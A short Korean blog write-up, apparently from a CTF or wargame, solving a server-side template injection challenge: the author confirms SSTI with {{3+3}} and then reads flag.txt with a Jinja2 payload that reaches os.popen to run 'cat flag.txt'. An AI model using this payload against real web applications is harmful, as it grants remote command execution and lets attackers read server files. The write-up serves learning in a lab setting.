CTF & Wargame(WEB)

SSTI 관련 문제 풀이

KWAKBUMJUN 2025. 5. 4. 22:18

ssti 관련 문제라고 설명이 있었기 때문에 {{3+3}}을 페이로드로 삽입하고 전송해보니, 6이 출력되는 것을 확인할 수 있었다.

따라서 템플릿 인젝션이 가능하다는 뜻이다.

 

문제 설명에 flag.txt에 flag가 있다고 했기 때문에 flag.txt를 열어봐야한다.

 

payload : {{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}

를 사용자 입력으로 입력하면

 

이렇게 flag가 출력되는 것을 확인할 수 있다.

 

 

'CTF & Wargame(WEB)' 카테고리의 다른 글

dreamhack username:password@ 풀이  (0) 2025.05.20
Black-Hacker-Company  (0) 2025.05.14
JWT (JSON Web Token) 취약점 관련 문제  (0) 2025.05.02
level 1 error based sql injection  (0) 2025.04.22
level 2 blind sql injection advanced  (0) 2025.04.22